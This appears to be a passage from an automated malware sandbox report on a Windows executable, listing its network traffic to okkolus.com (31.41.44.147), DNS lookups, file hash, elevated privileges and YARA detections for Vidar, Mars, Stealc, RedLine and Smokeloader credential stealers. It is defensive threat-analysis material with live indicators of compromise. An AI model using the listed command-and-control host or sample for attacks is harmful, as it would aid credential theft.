                                            May 6, 2024 02:52:44.446316957 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.483799934 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483870983 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.483947992 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483959913 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483974934 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483987093 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.484006882 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.484019041 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.571896076 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572068930 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.572226048 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572238922 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572251081 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572269917 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.572297096 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623730898 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623815060 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623840094 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623852015 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623882055 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623898983 CEST4971080192.168.2.631.41.44.147

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 6, 2024 02:52:35.917686939 CEST5711953192.168.2.61.1.1.1
                                            May 6, 2024 02:52:36.512387037 CEST53571191.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            May 6, 2024 02:52:35.917686939 CEST192.168.2.61.1.1.10xce17Standard query (0)okkolus.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            May 6, 2024 02:52:36.512387037 CEST1.1.1.1192.168.2.60xce17No error (0)okkolus.com31.41.44.147A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • okkolus.com

                                            Statistics

                                            No statistics

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:02:51:48
                                            Start date:06/05/2024
                                            Path:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\FFAk2gixx5.exe"
                                            Imagebase:0x400000
                                            File size:296'960 bytes
                                            MD5 hash:14CD6D9CBAD80B0E4076212BF7AD937F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            No disassembly